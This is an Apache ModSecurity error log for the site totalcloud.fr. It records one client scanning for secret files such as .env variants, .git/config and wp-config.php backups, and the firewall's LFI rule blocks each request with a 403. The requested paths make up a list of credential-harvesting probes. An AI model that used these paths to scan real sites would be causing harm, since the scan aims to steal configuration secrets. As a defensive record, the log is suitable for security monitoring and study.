[Tue May 12 02:39:41.795212 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LVgAAAJU"]
[Tue May 12 02:39:41.806734 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/local/.env"] [unique_id "agJ2zbOxS7i6i_mT2NLHTgAAAFM"]
[Tue May 12 02:39:41.806920 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/local/.env"] [unique_id "agJ2zbOxS7i6i_mT2NLHTgAAAFM"]
[Tue May 12 02:39:41.807244 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbOxS7i6i_mT2NLHTgAAAFM"]
[Tue May 12 02:39:41.835175 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env~"] [unique_id "agJ2zbOxS7i6i_mT2NLHUAAAAFM"]
[Tue May 12 02:39:41.835415 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env~"] [unique_id "agJ2zbOxS7i6i_mT2NLHUAAAAFM"]
[Tue May 12 02:39:41.835839 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbOxS7i6i_mT2NLHUAAAAFM"]
[Tue May 12 02:39:41.841422 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.save"] [unique_id "agJ2zVfdQaraX_prmqceOAAAABU"]
[Tue May 12 02:39:41.841648 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.save"] [unique_id "agJ2zVfdQaraX_prmqceOAAAABU"]
[Tue May 12 02:39:41.848871 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/HEAD"] [unique_id "agJ2zTue9Sp-pIv_Bb6PfwAAAVY"]
[Tue May 12 02:39:41.849067 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/HEAD"] [unique_id "agJ2zTue9Sp-pIv_Bb6PfwAAAVY"]
[Tue May 12 02:39:41.849412 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zTue9Sp-pIv_Bb6PfwAAAVY"]
[Tue May 12 02:39:41.851322 2026] [security2:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/wp-config.php~"] [unique_id "agJ2zbvMumyrWMfSu7qozgAAAMc"]
[Tue May 12 02:39:41.851495 2026] [security2:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/wp-config.php~"] [unique_id "agJ2zbvMumyrWMfSu7qozgAAAMc"]
[Tue May 12 02:39:41.852603 2026] [security2:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbvMumyrWMfSu7qozgAAAMc"]
[Tue May 12 02:39:41.857931 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zVfdQaraX_prmqceOAAAABU"]
[Tue May 12 02:39:41.873476 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/config"] [unique_id "agJ2zbvMumyrWMfSu7qozQAAAMI"]
[Tue May 12 02:39:41.873687 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/config"] [unique_id "agJ2zbvMumyrWMfSu7qozQAAAMI"]
[Tue May 12 02:39:41.874950 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbvMumyrWMfSu7qozQAAAMI"]
[Tue May 12 02:39:41.882968 2026] [:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.948321 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/wp-config.php.txt"] [unique_id "agJ2zdVI9ymHBxup74-LWQAAAJU"]
[Tue May 12 02:39:41.948581 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/wp-config.php.txt"] [unique_id "agJ2zdVI9ymHBxup74-LWQAAAJU"]
[Tue May 12 02:39:41.952509 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LWQAAAJU"]
[Tue May 12 02:39:41.963339 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/app/.env"] [unique_id "agJ2zTue9Sp-pIv_Bb6PgAAAAVY"]
[Tue May 12 02:39:41.963531 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/app/.env"] [unique_id "agJ2zTue9Sp-pIv_Bb6PgAAAAVY"]
[Tue May 12 02:39:41.963816 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zTue9Sp-pIv_Bb6PgAAAAVY"]
[Tue May 12 02:39:41.974253 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.019368 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.031908 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.ENV"] [unique_id "agJ2zjue9Sp-pIv_Bb6PgQAAAVY"]
[Tue May 12 02:39:42.032095 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.ENV"] [unique_id "agJ2zjue9Sp-pIv_Bb6PgQAAAVY"]
[Tue May 12 02:39:42.032378 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zjue9Sp-pIv_Bb6PgQAAAVY"]
[Tue May 12 02:39:42.032524 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/index"] [unique_id "agJ2zrOxS7i6i_mT2NLHUgAAAFM"]
[Tue May 12 02:39:42.032658 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/index"] [unique_id "agJ2zrOxS7i6i_mT2NLHUgAAAFM"]
[Tue May 12 02:39:42.032907 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrOxS7i6i_mT2NLHUgAAAFM"]
[Tue May 12 02:39:42.035900 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.gitignore"] [unique_id "agJ2zrvMumyrWMfSu7qo0AAAAMI"]
[Tue May 12 02:39:42.036027 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.gitignore"] [unique_id "agJ2zrvMumyrWMfSu7qo0AAAAMI"]
[Tue May 12 02:39:42.036264 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrvMumyrWMfSu7qo0AAAAMI"]
[Tue May 12 02:39:42.042272 2026] [access_compat:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] AH01797: client denied by server configuration: /home/totalcloud/public_html/wp-config.php
[Tue May 12 02:39:42.051357 2026] [:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.054267 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/storage/.env"] [unique_id "agJ2ztVI9ymHBxup74-LWgAAAJg"]
[Tue May 12 02:39:42.054408 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/storage/.env"] [unique_id "agJ2ztVI9ymHBxup74-LWgAAAJg"]
[Tue May 12 02:39:42.054670 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2ztVI9ymHBxup74-LWgAAAJg"]
[Tue May 12 02:39:42.055605 2026] [:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.064590 2026] [:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.065326 2026] [security2:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agJ2zrvMumyrWMfSu7qo1AAAAMc"]
